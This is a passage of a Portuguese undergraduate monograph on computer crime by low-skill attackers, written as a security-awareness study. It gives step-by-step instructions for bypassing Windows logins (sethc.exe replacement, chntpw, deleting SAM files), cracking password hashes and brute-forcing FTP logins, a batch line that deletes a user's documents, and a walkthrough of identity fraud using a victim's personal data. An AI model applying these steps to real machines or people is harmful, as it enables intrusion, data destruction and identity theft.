Escolar Documentos
Profissional Documentos
Cultura Documentos
TECNOLOGIA
DE SÃO CAETANO DO SUL
Aprovado em:
Banca Examinadora
Resumo
Neste trabalho, são discutidas algumas das técnicas mais simples utilizadas para a
prática de crimes no âmbito computacional. A metodologia adotada foi a análise de exemplos
práticos de como alguns crimes são cometidos e a realização de experimentos com o objetivo
abordar as falhas tecnológicas relacionadas à área de segurança de informação. Este trabalho e
a adoção de tal metodologia justificam-se pela falta de consciência que muitas pessoas têm
sobre a necessidade de segurança das informações. O fato é que muitos nem mesmo fazem
atualizações de segurança sem saber que, mesmo sem documentos importantes, o computador
pode ser utilizado remotamente para diversas finalidades. A análise dos crimes feita nesta
monografia tem foco nos cometidos por pessoas que possuem conhecimento entre os níveis
básico e intermediário em informática. Dentre os crimes abordados, estão os de roubo, furto,
invasão de privacidade, falsidade ideológica, sequestro e até mesmo crimes hediondos. A
pesquisa utiliza-se de uma linguagem simplificada e acessível, explicando termos técnicos de
difícil entendimento para que, mesmo as pessoas que não estão acostumadas aos jargões da
área possam entender a necessidade de se proteger contra tais crimes, após descobrir com que
facilidade eles são cometidos. Os resultados obtidos pela demonstração da facilidade de se
cometer crimes de informática são as medidas de segurança que usuários de sistemas de
informática passarão a adotar e a conclusão de que, para se proteger, é necessário conhecer os
atacantes e as técnicas de ataque.
Abstract
In this paper, are discussed some of the simplest techniques used to commit crimes
within computing. The adopted methodology was the analysis of practical examples of how
some crimes are committed and the conducting experiments with the objective to broach the
technological failures in the information security. This work and the adoption of such methods
are justified by the lack of awareness that some people have about the importance of
information security. The fact is that some people do not make security updates without
knowing that, even without important documents, the computers can be used remotely by a
cracker for different purposes. The analysis of the crimes that are done in this paperwork has
focused on those ones committed by people who do not have experience with computers and
people who have basic knowledge. Among the crimes broached in this paper are theft,
invasion of privacy, forgery, kidnapping and other crimes. The research makes use of a
simplified and accessible language, explaining difficult technical terms so that even people
who are not accustomed to jargon can understand the necessity of protection against such
crimes after discovering how easily they are committed. The results gotten from the
demonstration of the easiness of committing computer crimes are the security measures that
users of computer systems will take and the conclusion that, to protect the computers systems,
it is necessary to know the aggressors and the attack techniques.
1 Introdução ........................................................................................................................... 13
1.1 Objetivos ..................................................................................................................... 14
2 Conceitos básicos e definições ........................................................................................... 16
2.1 Crime ........................................................................................................................... 16
2.2 Distinções entre hacker e cracker; hackerismo e crackerismo................................. 16
2.3 Firewall ........................................................................................................................ 18
2.4 “Laranja” .................................................................................................................... 18
2.5 Segurança em ambientes corporativos ..................................................................... 18
2.6 Conscientização .......................................................................................................... 19
2.7 Obtenção de dados ..................................................................................................... 20
2.8 Como os criminosos escolhem um “laranja” ........................................................... 21
2.9 Exemplos reais de crimes ........................................................................................... 23
2.9.1 Incidentes envolvendo bancos ........................................................................... 24
2.9.2 Invasões ............................................................................................................... 24
2.9.3 Sequestro ............................................................................................................. 25
3 Técnicas e conhecimentos básicos ..................................................................................... 26
3.1 Engenharia social ........................................................................................................ 26
3.2 Outras formas de ligar o computador ....................................................................... 27
3.3 Obter acesso completo a sistemas Windows protegidos por senha ......................... 29
3.3.1 Senhas do Windows 95,98 e Millennium .......................................................... 34
3.3.2 Senhas do Windows NT e 2000 ......................................................................... 34
3.3.3 Senhas do Windows XP, 2003, Vista e 7 ........................................................... 35
3.3.4 Descobrir senhas sem alterá-las ........................................................................ 38
3.3.4.1 Senhas armazenadas no computador ..................................................... 42
3.3.4.2 Invasão de contas de e-mail e sites por meio da senha .......................... 43
4 Técnicas que demandam conhecimentos básicos ............................................................ 47
4.1 Criação de um programa para fins maliciosos ........................................................ 47
4.1.2 Arquivos de processamento em lote (batch) ..................................................... 47
4.1.2.1 Como compilar um arquivo de processamento em lotes ....................... 50
4.1.3 Como um vírus pode ser anexado a outro arquivo ......................................... 51
4.2 DNS spoofing .............................................................................................................. 55
4.3 Fraude em contas bancárias ...................................................................................... 57
4.3.1 Pharming ............................................................................................................. 57
4.3.2 Phishing scam e e-mail spoofing ........................................................................ 61
4.3.3 Man In The Middle (MITM) e sequestro de sessão ......................................... 63
4.4 Quebra de senhas de redes sem fio ........................................................................... 71
4.4.1 Captura de tráfego ............................................................................................. 71
4.4.2 Como quebrar senhas WEP .............................................................................. 74
4.4.2.1 Como fazer autenticação falsa e acelerar o tráfego ............................... 76
4.4.3 Descoberta de senhas WPA/WPA2 ................................................................... 78
4.5 Computadores “zumbis” ........................................................................................... 83
4.5.1 Ataque DdoS ....................................................................................................... 83
4.5.2 Outros tipos de ataques feitos por computadores “zumbis” .......................... 85
5 Considerações finais ........................................................................................................... 86
6 Referências bibliográficas ................................................................................................. 87
13
1 Introdução
Este estudo tem como intento descrever como alguns crimes de informática podem ser
cometidos por pessoas que não possuem conhecimentos avançados na área. Muito se tem
afirmado que é um “mito” a necessidade de aprender técnicas de ataque para poder se
defender com eficiência (RUFINO, 2002), porém, pesquisas mostram que a quantidade de
crimes cometidos pela internet cresce em ritmo acelerado (CERT.BR, 2010) e levam a crer
que os atuais mecanismos de segurança adotados não são eficientes ou suficientes. Segundo
pesquisas atuais, o principal fator responsável pelo grande número de problemas relacionados
à segurança da informação é a má utilização das tecnologias (FECOMERCIO, 2010), e uma
das medidas consideradas mais eficientes no combate aos incidentes é a conscientização dos
usuários (RODRIGUES, 2010).
Um profissional que atua em um seguimento completamente distinto da informática,
dificilmente possui conhecimentos avançados para manipular regras de firewall, configurar
seu antivírus de forma eficiente, saber quais ações tomar quando ameaças são encontradas,
verificar cabeçalhos de e-mails e saber quais são confiáveis, ou ainda, deduzir com destreza
em quais locais ele pode ou não clicar.
Para uma pessoa que, não necessariamente precisa entender a fundo os sistemas
computacionais a fim de realizar as funções correlatas à sua profissão, como um médico,
advogado, metalúrgico, ou, até mesmo, pessoas que utilizam computadores com frequência,
mas não necessitam de conhecimentos avançados para desempenhar suas funções, como
secretárias ou gerentes de empresas, o estudo de meios técnicos utilizados para uma proteção
eficiente pode causar enfado e não ser eficiente na prevenção de incidentes. Considerando
como correta a conclusão de que é mais eficiente apontar as fragilidades nos processos do que
apenas aconselhar usuários sobre boas práticas de segurança, neste trabalho são discutidos
alguns crimes que podem ser cometidos com certa facilidade, incidentes que ocorrem com
frequência, mas são encobertos para não denegrir a imagem de empresas e, é feita uma
tentativa de demonstrar que nem sempre se deve confiar veementemente em sites que exibem
mensagens dizendo serem cem por cento seguros ou em processos e programas que não
levantam suspeitas.
Devido ao rápido avanço da tecnologia, muitas das ferramentas que exploram as
vulnerabilidades, técnicas de ataque e brechas de segurança aqui discutidas, certamente
ficarão obsoletas com o passar do tempo e não mais poderão ser usadas. Porém, assim como
14
ainda hoje é possível explorar falhas e brechas existentes desde o começo da era da
informática, possivelmente, muitos anos ainda serão necessários para que este trabalho se
torne totalmente desatualizado, principalmente no que diz respeito à principal brecha de
segurança hoje existente: as falhas humanas.
É fato que as ferramentas e técnicas utilizadas por criminosos que atuam na área de
informática evoluíram desde o surgimento dos primeiros computadores; no entanto, as
técnicas de defesa também evoluíram de forma considerável.
Com a utilização de boas ferramentas de proteção e configurações bem elaboradas, a
maior brecha de segurança passa a ser a fraude ou erro humano. Para mitigar riscos oriundos
de falhas humanas, dois fatores são de extrema importância: o treinamento e a
conscientização. Com a falsa ideia que algumas pessoas têm sobre a frequência com que os
crimes de informática são cometidos e sobre o nível de conhecimento necessário para cometê-
los, convencer alguém sobre a necessidade de adotar medidas de segurança, em alguns casos,
torna-se um desafio.
1.1 Objetivos
2.1 Crime
2.3 Firewall
Esta palavra, cuja tradução literal é “parede de fogo”, será bastante utilizada no texto,
portanto, seu entendimento é fundamental para a perfeita compreensão do conteúdo.
O firewall pode ser um software que, após ser instalado e configurado em um
computador, tem a função de bloquear acessos e conexões suspeitas ou previamente
bloqueadas. Além de um software, um firewall pode ser um componente dedicado
exclusivamente para analisar o tráfego e controlar os acessos que são permitidos ou não. Em
médias e grandes empresas, são utilizados equipamentos cuja única função é a de firewall, o
que evita a lentidão na rede e permite maior precisão no controle de acesso.
A definição abaixo, além de breve e simples, permite o entendimento básico do
conceito de firewall.
"Programa ou componente dedicado, que protege a rede contra invasões externas e
acessos não autorizados.” (MORIMOTO, 2002, p.181).
2.4 “Laranja”
Não foi encontrada nenhuma outra palavra mais formal e que não tenha sentido
figurado para reproduzir fielmente o significado deste termo.
Quando a palavra “laranja” é mencionada nesta pesquisa, ela tem o seguinte
significado: Indivíduo, nem sempre ingênuo, que ajuda, de forma involuntária ou não, com
seu nome e/ou dados pessoais, na concretização de um crime, recebendo o ônus total ou
parcial.
ao valor de seus ativos e o grau de risco a que eles estão expostos. No mercado, podemos
encontrar diversas soluções de segurança voltadas para o ambiente corporativo que
incrementam a segurança dos sistemas. Muitas vezes, tais soluções são realmente necessárias,
porém, tratadas como opcionais. A maioria das técnicas apresentadas neste trabalho,
consideradas técnicas de lammers ou script kiddies (iniciantes), podem ser facilmente
bloqueadas com soluções simples. Dos iniciantes, geralmente, apenas uma boa configuração é
suficiente para se prevenir, o que não exige a aquisição de programas ou equipamentos.
A segurança em empresas (mesmo nas pequenas) deve ser diferenciada. Para manter a
segurança nas empresas, algumas medidas genéricas, básicas e importantes são:
-Aquisição e atualização periódica de antivírus corporativo;
-Configuração personalizada de firewall;
-Atualização dos programas e sistemas operacionais da empresa;
-Adoção de políticas de segurança e conscientização de funcionários.
As medidas supracitadas são recomendadas a qualquer tipo e porte de empresa.
Medidas adicionais, entretanto, podem e devem ser tomadas de acordo com a realidade de
cada empresa.
Devido às técnicas avançadas e requintadas que alguns criminosos utilizam, somente
instalar um antivírus e manter o computador atualizado não são medidas que garantam a
segurança de nossas redes.
2.6 Conscientização
Um dos fatores que mais possibilitam pessoas mal intencionadas cometerem crimes de
informática é a exposição de dados. Há diversos dados que um criminoso pode utilizar para
cometer um crime. Com o auxílio de um computador, muitos deles podem ser encontrados
como: dados cadastrais que circulam livremente na internet, identificações únicas em
processadores e placas de rede, logs (arquivos que armazenam dados sobre o que acontece em
um sistema), histórico de navegação, cookies (documentos de texto armazenados pelos
navegadores), lista de documentos recentes, mensagens de comunicadores instantâneos e até
mesmo documentos do pacote de programas Microsoft Office que armazenam informações
sobre quem criou o documento (THOMPSON, 2004).
Atualmente, uma das melhores formas de se conseguir informações são os sites de
busca na internet. Através deles, é possível obter informações das mais diversas sobre várias
pessoas que nem imaginam ter seu nome exposto na internet Estas informações são
frequentemente oriundas de cadastros feitos em sites ou, até mesmo, cadastros feitos em
estabelecimentos físicos.
Não são só dados cadastrais que circulam pela internet. Segundo Rafael Sbarai em um
artigo publicado na revista Veja, em abril de 2010, o Facebook, uma das maiores redes sociais
21
do mundo (supera a marca de 400 milhões de usuários), em sua décima sétima mudança nas
políticas de privacidade, tornou públicos os dados de todos os seus usuários. Dentre as
informações contidas nestes dados estão: nome, profissão, cidade, lista de amigos e álbum de
fotos. Ainda de acordo com a reportagem, as autoridades de proteção de dados da União
Europeia consideraram esta abertura como “inaceitável” (SBARAI, 2010).
Além das fontes já citadas, também é possível encontrar informações de alto valor em
sites como: http://telelistas.net/, http://www.previdenciasocial.gov.br/,
http://www.detran.sp.gov.br/, http://www.registro.br/, http://www.whois.net/,
https://registro.br/cgi-bin/whois/ e muitos outros.
Na imagem anterior é possível observar que, logo nos três primeiros resultados da
busca, o criminoso pode achar algo que possivelmente lhe interesse. O primeiro resultado
mostra até mesmo o endereço (além do CPF) de um Mário que possivelmente mora em Minas
Gerais. No segundo, é possível verificar um site do governo federal divulgando informações
pessoais de diversas pessoas para, literalmente, quase o mundo inteiro. No terceiro resultado,
mais uma vez é possível visualizar o nome, CPF e endereço de outra pessoa que se chama
Mario. Após a rápida obtenção destes dados, o criminoso pode entrar no site
“http://www.receita.fazenda.gov.br/aplicacoes/atcta/cpf/consultapublica.asp” e verificar a
situação cadastral do CPF para não correr o risco de ter algum insucesso ao cometer fraudes
devido a problemas com o documento.
Com o nome completo da pessoa e outros dados pessoais, muitas vezes é possível
encontrar em outros sites diversas informações do futuro “laranja”. Caso o criminoso queira ir
mais além, pode escolher um “laranja” que tenha mais ou menos sua idade (preferencialmente
de outro estado), fazer um boletim de ocorrência passando-se pelo “laranja” em alguma
delegacia dizendo que foi assaltado e teve todos os seus documentos roubados, e começar a
providenciar, legalmente, novos documentos. O criminoso pode conseguir uma certidão de
nascimento em um cartório e, levando em consideração que a carteira de identidade é de
responsabilidade dos governos estaduais e válida em todo o território nacional, de posse da
certidão de nascimento e quatro fotos, a pessoa com más intenções pode tentar fazer a carteira
de identidade em algum estado que não adotou o novo documento com chip e banco de dados
integrado de impressões digitais (SIQUEIRA, 2010).
Após conseguir documentos como RG, CPF e certidão de nascimento, todos eles
expedidos por órgãos oficiais, é possível obter ainda mais documentos, alugar
temporariamente uma casa, abrir conta em banco, obter empréstimos, fazer compras e,
posteriormente, descartar todos os documentos do “laranja” e voltar para seu estado de origem
com os bens adquiridos, agindo como se nada tivesse acontecido. Possivelmente, a pessoa
lesada só irá perceber o que aconteceu quando for investigar o motivo de seu nome estar
“sujo”. Mesmo se conseguir provar que não fez compras ou pegou empréstimos, terá muitos
problemas para reparar todo o dano causado.
Com o exemplo acima é possível concluir que, se nenhum site na internet tratasse
dados pessoais como se fossem informações públicas, o criminoso não teria tanta facilidade
para agir. O exemplo também permite afirmar que não é necessário um elevado conhecimento
em informática para utilizar a tecnologia como ferramenta principal, na hora de cometer um
23
crime.
Outras artimanhas menos conhecidas também podem ser utilizadas para escolher um
“laranja” a fim de realizar de crimes difíceis de serem investigados.
Muitas pessoas compram equipamentos como dispositivos de rede sem fio e apenas
ligam o aparelho, preservando as configurações originais de fábrica. Por padrão, a grande
maioria desses dispositivos não possui qualquer configuração de segurança como, por
exemplo, uma senha de acesso. Uma pessoa com conhecimentos superficiais de informática
pode, sem dificuldade alguma, utilizar a conexão que o dono do aparelho possui com a
internet e praticar atividades como, por exemplo, acessar sites de pornografia infantil. Neste
caso, o acesso pode ser rastreado pela polícia e, a pessoa que primeiramente será encontrada é
a dona do equipamento sem fio. Mesmo se for definida uma senha para acesso lógico ao
equipamento, uma pessoa com conhecimentos intermediários em redes sem fio pode
facilmente descobrir a senha se ela não for complexa e de um padrão de tecnologia
(protocolo) seguro. Mesmo uma pessoa que não possui equipamentos de rede sem fio, mas
mantém seu computador desatualizado, muitas vezes com vírus, também pode, com grande
facilidade, tornar-se um “laranja” tendo seu computador invadido.
Outra forma de se utilizar um “laranja”, bastante verificada em empresas, é realizar
um procedimento chamado e-mail spoofing. Esta técnica consiste em forjar um e-mail, muitas
vezes com um remetente que é conhecido da pessoa que recebe. Um exemplo de como esta
técnica pode ser utilizada é um criminoso utilizar o endereço de e-mail de algum funcionário
de uma empresa, passando-se por ele, e tentar obter alguma informação que poucas pessoas
conseguiriam.
Os crimes de informática, dos mais brandos aos mais nefastos, acontecem com grande
frequência em vários países e empresas com diferentes níveis de segurança. A grande maioria
das pessoas não dá a importância devida às notícias ou, muitas vezes, nem fica sabendo delas.
Os bancos, por exemplo, não costumam divulgar seus incidentes de segurança por razões
óbvias – quem confiaria seu dinheiro a um banco declaradamente inseguro? –, porém, é
possível encontrar diversos relatos pessoais e não formais. Por exemplo, se a frase ”Caixa
eletrônico do Banco invadido por hackers”, for digitada no campo de busca do maior site de
compartilhamento de vídeos do mundo, será mostrado um vídeo onde há um caixa eletrônico
24
de uma instituição financeira brasileira de grande porte com a imagem de uma mulher nua.
Uma suposta vítima de fraude filmou o caixa eletrônico e narrou o fato possivelmente
ocorrido.
Para dar mais credibilidade às hipóteses e exemplos citados ao longo deste trabalho, foram
extraídas de jornais respeitados, tribunais de justiça e revistas, algumas notícias que podem
confirmar as afirmações do parágrafo acima.
O banco Bradesco S/A foi condenado pelo Tribunal de Justiça de Minas Gerais a indenizar
um advogado que sofreu uma invasão cracker e teve um prejuízo de R$ 8.626,31. O
advogado obteve direito de ressarcimento do valor, além de uma indenização por danos
morais no valor de R$ 5.800. Assim que percebeu algo de errado com sua conta, o advogado
contatou o gerente do banco e foi informado de que nada poderia ser feito. O advogado então
registrou um boletim de ocorrência, notificou oficialmente a agência e, segundo ele, o banco
não respondeu aos apelos. Em sua defesa, o banco Bradesco declarou que a vítima
possibilitou que terceiros tivessem acesso à sua senha de uso pessoal e intransferível, além de
declarar que o sistema de segurança do banco é infalível (TRIBUNAL DE JUSTICA DE MINAS
GERAIS, 2010).
Um cracker brasileiro de 24 anos foi preso no dia 04/06/2010 após pedir US$ 500 mil a
um banco de investimentos de São Paulo para evitar o roubo de US$ 2 milhões. O cracker
enviava e-mails para o banco com informações sigilosas (para provar que tinha acesso ao
sistema) e passava um número de celular para contato (o celular foi comprado com os dados
de um dos diretores da empresa). O grande erro do cracker foi comparecer pessoalmente para
receber o dinheiro na sede do banco localizado na AV. Paulista, em São Paulo, onde agentes
do Departamento de Investigações Sobre Crime Organizado (DEIC) prenderam o criminoso
(AGÊNCIA DO ESTADO, 2010).
2.9.2 Invasões
2.9.3 Sequestro
sistema de segurança facilmente burlado. Para exemplificar o uso da engenharia social que
pode ser feito neste caso, é possível descrever um cenário no qual um funcionário (mais
conhecido como insider) foi pago por uma concorrente para obter informações sigilosas que
foram enviadas para a caixa de correio eletrônico de seu chefe ou diretor. O funcionário
criminoso pode utilizar a internet ou algum outro meio para conseguir o CPF do titular da
conta de e-mail e, simplesmente, ligar para o help desk, dizer que esqueceu a senha, confirmar
os dados da vítima e obter uma nova senha. A desvantagem deste processo é que a
possibilidade de a vítima rapidamente descobrir que há algo de errado com sua conta de e-
mail é muito alta, o que obriga o criminoso a, assim que conseguir o acesso, copiar o mais
rápido possível as informações que podem ser úteis.
costumam variar pouco de computador para computador e, para acessá-las, deve-se digitar
uma tecla que varia entre o F2, Delete, Esc, F6, F8 e F10, logo que o computador é ligado
(antes de o sistema operacional ser carregado).
Neste trabalho, para exemplificar alguns ataques, é utilizada a quarta versão da
distribuição Back-Track do Linux. Esta distribuição foi especialmente criada para a realização
de testes de penetração, porém, outras podem ser utilizadas. Há também a possibilidade de
iniciar sistemas a partir de pen-drives e Live-CDs baseados em sistemas Windows, que podem
ser facilmente encontrados digitando-se os termos “boot pendrive” e “Windows PE” nos sites
de busca.
Também é possível obter acesso total ao sistema com alguns CDs de instalação, como, por
exemplo, o DVD de instalação do Windows Vista. Para visualizar, copiar ou apagar algum
arquivo a partir de um DVD de instalação do Windows Vista é necessário configurar o
computador para que inicie pelo DVD e então aparecerá a mensagem para apertar uma tecla
para iniciar a partir do CD ou DVD. Ao apertar uma tecla qualquer, o sistema começará a
carregar o programa de instalação. Após esta etapa, irá aparecer a tela para a escolha do
idioma e, ao clicar em “Avançar”, o sistema trará as opções de instalar o Windows ou reparar
o computador. A opção de reparar o computador deve ser escolhida e, após a exibição da tela
apresentando a instalação a ser reparada, será mostrada a janela de recuperação do sistema,
com várias opções, inclusive o acesso às linhas de comando com opções de administrador,
como na figura abaixo.
A grande maioria dos sistemas operacionais (como o MAC OS, Linux, Unix, etc.)
possuem graves brechas de segurança, porém, devido à quantidade de usuários dos sistemas
Windows, ele é o mais explorado.
Há variadas formas de se conseguir elevação de privilégios em sistemas operacionais
Windows. As mais óbvias e conhecidas são a exclusão ou descoberta de senhas de usuários
administradores. Porém, há outras formas de conseguir acesso de administrador, como a
utilização de outras contas nativas do Windows a exemplo da conta “system” (com mais
privilégios que a conta de administrador), a conta de convidado (geralmente limitada) e a
utilização de programas que utilizam outras contas mesmo quando executados por usuários
com acesso limitado.
Das técnicas mencionadas, talvez a mais utilizada e conhecida para obter acesso
privilegiado a sistemas Windows é usufruir da conta “system”. Uma forma de utilizá-la é
executar o programa que terá privilégios de sistema antes de algum usuário efetuar o logon
(acesso ao sistema). Um exemplo de como isso pode ser feito é utilizar a proteção de tela ou
as teclas de atalho do Windows, pois elas podem ser ativadas antes de algum usuário digitar
seus dados e acessar o sistema (tela de logon).
Quando configurada, a proteção de tela entra automaticamente após certo período de
tempo e o programa responsável por sua execução é o “Logon.scr”, que fica em
C:\Windows\System32 e, em versões mais antigas do Windows, os arquivos de proteção de
tela são os com extensão “.SCR” e costumam ficar na pasta C:\WINDOWS\SYSTEM.
A proteção de tela encontra-se habilitada na maioria dos sistemas Windows e, quando
executada, no caso dos sistemas mais novos, qualquer programa que tenha o nome
“Logon.scr” e estiver dentro da pasta C:\Windows\System32 será executado.
Uma desvantagem de utilizar a proteção de tela para obter acesso não autorizado é que
nem sempre ela está ativada e, mesmo quanto está, é necessária a espera de alguns minutos ou
até horas para a execução do programa. A utilização das teclas de atalho do Windows para a
execução de programas a partir da conta “system” mostra-se mais eficaz devido ao fato de ser
possível sua execução a qualquer momento (basta apertar a tecla Shift por cinco vezes) e por
estar habilitada em praticamente todos os sistemas operacionais Windows.
Na prática, para utilizar as teclas de atalho a fim de executar um programa com acessos de
sistema, deve-se renomear ou apagar o arquivo “sethc.exe”, que fica localizado no diretório
30
Na figura abaixo, o prompt de comandos foi utilizado para trocar a senha de um usuário
com o comando “net user nome_do_usuário senha_desejada”.
-Na janela que aparecer, é preciso selecionar a aba proprietário e clicar no botão editar.
Até mesmo as versões NT e 2000, consideradas mais seguras, podem ter todas as suas
senhas e contas de usuários apagadas, somente com a exclusão de arquivos. No caso destes
sistemas, o arquivo com informações de usuários e senhas é o arquivo SAM localizado na
pasta C:\WINNT\system32\config. Para excluir as contas de usuários e suas respectivas
senhas, basta apagar três arquivos: na pasta C:\WINNT\system32\config os arquivos SAM e
SAM.LOG e, na pasta C:\winnt\repair, o arquivo SAM. A diferença dos sistemas baseados no
Windows NT é não ser possível a exclusão de arquivos de senhas com o sistema funcionando
e sem nenhuma ferramenta especial, pois o arquivo fica em uso. A solução é apagá-los com
outro sistema operacional instalado no computador, utilizando um Live-cd, pen-drive com o
Linux ou Windows instalado ou o CD de instalação de algum sistema operacional.
35
No caso dos sistemas operacionais mais recentes da Microsoft, apagar ou trocar senhas
dos usuários ou administradores do sistema sem possuir uma conta, é uma tarefa que exige a
utilização de diferentes procedimentos ou ferramentas, pois não se resume em excluir
arquivos. Uma das formas mais simples de se obter acesso às contas de administrador em
sistemas operacionais Windows mais novos é utilizar algum CD de inicialização que contenha
ferramentas para realizar tal tarefa. Uma boa opção é o “Ultimate Boot CD (UBCD)” ou o
“Hiren´s BootCD”. Há também ferramentas mais avançadas e com diversas opções para a
manipulação de senhas e usuários em sistemas Windows. Para exemplificar o uso de
ferramentas com opções avançadas, utilizaremos o programa “chntpw” que, por padrão, já
vem instalado na distribuição “BackTrack” – do Linux.
Dentre as opções que o “chntpw” oferece estão: editar o registro do Windows, editar
opções do console de recuperação, manipular senhas de usuários, desbloquear contas e incluir
uma conta limitada no grupo dos administradores. Vale lembrar que, para alterar corretamente
uma senha em sistemas Windows mais atuais, é preciso uma informação (hash) do arquivo
“system” que fica no mesmo diretório do arquivo “SAM”. O procedimento de troca de senha
é pouco mais complexo, portanto, apenas será explicado como é feito para apagar a senha de
uma conta de um usuário do sistema. Caso seja necessário colocar uma nova senha, basta
acessar a conta (que estará sem senha) e adicionar uma.
Com o “BackTrack 4” iniciado a partir de um CD, DVD ou pendrive, é possível acessar
um HD com a instalação do Windows utilizando os seguintes comandos:
cd /
mkdir /media/teste
mount dev/hda1 /media/teste
O último comando deve ser modificado para “mount dev/sda1 /media/teste” caso o disco
rígido do computador utilize a tecnologia Serial Advanced Technology Attachment (SATA).
Em casos de problemas com o acesso ao disco rígido que contém a instalação do
Windows, pode ser necessário forçar a montagem da partição. O seguinte comando pode ser
utilizado para forçar a montagem da partição:
mount -t ntfs-3g /dev/hda1 /media/teste -o force
Após a obtenção de acesso ao local onde o Windows está instalado, é possível verificar as
opções de manipulação do sistema com o comando:
36
chntpw -i media/teste/WINDOWS/system32/config/SAM
Caso não ocorra nenhum imprevisto, e o comando acima seja digitado corretamente
(levando em consideração letras maiúsculas e minúsculas), resultados conforme a imagem
seguinte deverão aparecer.
Para apagar a senha de um usuário do sistema, a primeira opção deve ser selecionada.
Caso a tecla “enter” seja pressionada sem a escolha de nenhuma opção, automaticamente
a primeira será escolhida. Após a escolha da primeira opção, será exibida uma lista com todos
os usuários que possuem uma conta no sistema e informações como, por exemplo, se a conta
está habilitada, bloqueada, o código em número hexadecimal do Relative-Identifier (RID) e se
a conta possui privilégios de administrador. Para alterar a senha de algum usuário, basta
digitar seu respectivo nome. Caso nenhum nome de usuário e nenhum RID sejam digitados, o
usuário “Administrador” será automaticamente selecionado se a tecla “enter” for pressionada.
Como é possível visualizar na figura acima, o programa também exibe informações sobre
as políticas de senha do sistema e oferece opções para a alteração de contas de usuário.
Ao selecionar a primeira opção “Edit user data and passwords”, o aplicativo faz uma
listagem das contas de usuários (quadro vermelho). As contas que aparecem com a opção
“dis/lock” estão bloqueadas ou desabilitadas.
Após digitar o nome de um usuário ou seu respectivo RID em número hexadecimal, será
exibida uma tela com a qual será possível concluir a exclusão de senha de usuário. A
ilustração a seguir destaca com setas vermelhas as opções que devem ser selecionadas para
excluir com sucesso a senha de algum usuário do sistema.
38
Center com o Service Pack 2. Durante a elaboração desta monografia, este procedimento
também foi testado nos sistemas operacionais mais atuais da Microsoft, funcionando sem
problemas. Também a fim de exemplificar a obtenção dos arquivos de senha sem a
necessidade de utilizar um Live-CD ou outra forma de iniciar o sistema, foi utilizado o
programa “FTK Imager v2.5.3.14”. Qualquer forma de obtenção dos arquivos pode ser
utilizada, porém, o procedimento descrito abaixo pode ser útil para sistemas com dados
criptografados ou que possuem senhas no sistema básico de entrada e saída (BIOS) e não
permitem a inicialização a partir de um dispositivo móvel.
A obtenção dos arquivos de senha com o sistema ainda em execução é possível com a
utilização de programas para recuperação de arquivos excluídos, como o “NTFS Reader” ou,
como na imagem abaixo, o “FTK Imager”.
Após obter os arquivos que contêm informações sobre as senhas, a pessoa com a
intenção de descobri-las pode abrir os arquivos “SAM” e “system” com o programa “Cain &
Abel” e escolher um dos métodos de quebra de senhas disponíveis.
40
A imagem abaixo ilustra as etapas realizadas para carregar os arquivos do sistema. Após a
realização das etapas, serão carregadas informações sobre todos os usuários do sistema.
Este aplicativo oferece três opções para descobrir senhas de contas de usuários: ataque de
dicionário, força bruta e Rainbow Tables. Um ataque de dicionário é baseado em uma lista
(arquivo de texto) que contém uma grande quantidade de possíveis senhas. Pode ser um
método extremamente rápido e eficiente caso um bom arquivo de dicionário (wordlist) seja
utilizado. Uma Wordlist, além de comprada ou baixada da internet, pode ser criada por
programas como o “DCM” e o “Wordlist Producer” (TOMPSON, 2004, p159). O ataque de
força bruta, por sua vez, tenta todas as combinações possíveis entre caracteres previamente
escolhidos.
Para armazenar as senhas dos usuários, o Windows utiliza uma sequência de números
hexadecimais (hash) para dificultar o processo de descoberta de senhas. O hash das senhas é
obtido através de um complexo cálculo matemático, o que aumenta significativamente o
tempo necessário para descobrir as senhas. Visando a diminuição deste tempo, arquivos
41
contendo uma lista de hashs já calculados (também conhecidos como Rainbow Tables)
frequentemente são utilizados com o intuito de diminuir o tempo do processo.
Para a criação de Rainbow Tables, podem ser utilizadas ferramentas como o “Winrtgen”,
parte integrante do “Cain & Abel v4.9.36”.
No exemplo abaixo é utilizado um ataque de força bruta que, apesar de ser um método
que pode levar horas ou até mesmo anos (dependendo da complexidade da senha e poder de
processamento) ainda é bastante eficiente, além de não necessário nenhum arquivo de
dicionário ou Rainbow Table para utilizá-lo.
O “Cain & Abel” é uma poderosa ferramenta capaz de, entre outras coisas, descobrir
senhas de diversos sistemas por diferentes métodos. Senhas com menos de oito caracteres
podem ser descobertas com facilidade em menos de um dia. Neste exemplo, o programa levou
menos de um segundo para revelar uma senha de quatro dígitos (extremamente fraca). Na
figura anterior é possível verificar (círculo vermelho) que o aplicativo indica as possíveis
42
Na tela principal da segunda versão do programa “Brutus”, apenas alguns itens são
necessários configurar para a realização da tentativa de ataque.
Brutus. Figura 19
Como o nome sugere, o “Brutus” suporta ataques de força bruta, porém, neste exemplo,
foi utilizada uma wordlist.
Wordlist. Figura 20
45
Para invadir um site e visualizar, copiar, excluir ou alterar arquivos um cracker pode
utilizar esta mesma ferramenta, apenas com configurações diferentes.
Além de uma boa wordlist, o sucesso do ataque a um site também vai depender de uma
boa configuração das opções “connections” e “timeout”.
A obtenção dos dados do servidor também pode ser feita através de sites de busca, com a
procura de páginas que contêm termos como “acessar ftp nome do local de hospedagem”.
Para saber onde o site está hospedado, basta pesquisar o domínio em sites como o
“http://www.whois.net/”.
Após a obtenção da senha, para acessar o conteúdo do site a ser invadido, é possível
utilizar ferramentas dos próprios provedores de hospedagem (quando disponíveis) ou utilizar
programas como o “FileZilla” para visualizar, copiar, excluir ou modificar arquivos do site.
Em boa parte dos provedores de hospedagem, a senha do Secure Shell (SSH) é a mesma
senha do servidor FTP. Nestes casos, é possível fazer a utilização de programas como o
“PuTTY” para manipular, além do conteúdo do servidor FTP, o banco de dados do site.
47
Neste capítulo, são abordadas técnicas que, para executá-las, é necessário possuir
conhecimentos básicos na área de informática ou, pelo menos, a leitura dos tópicos anteriores.
Os códigos dos programas e de arquivos de execução em lote contidos nesta pesquisa
foram desenvolvidos exclusivamente para esta monografia e suas finalidades se limitam às
acadêmicas.
Além de modificar códigos criados por outras pessoas, também é possível, a partir de
técnicas bem difundidas na internet, executar tarefas maliciosas com poucas linhas de
comandos. Um exemplo de como isso pode ser feito em um sistema Windows é abrir o
conhecido bloco de notas, digitar sem as aspas “del %homepath%\Documents\*.* /f/s/q” e
salvar o arquivo com a extensão “.bat”. Se for executado, todos os arquivos que estiverem na
pasta “Meus Documentos” serão excluídos.
Um batch como o do exemplo acima, pode trazer um grande problema, caso documentos
importantes sejam apagados. Outro aspecto interessante dos arquivos de processamento em
lote é que dificilmente eles são bloqueados por programas antivírus, permitindo sua
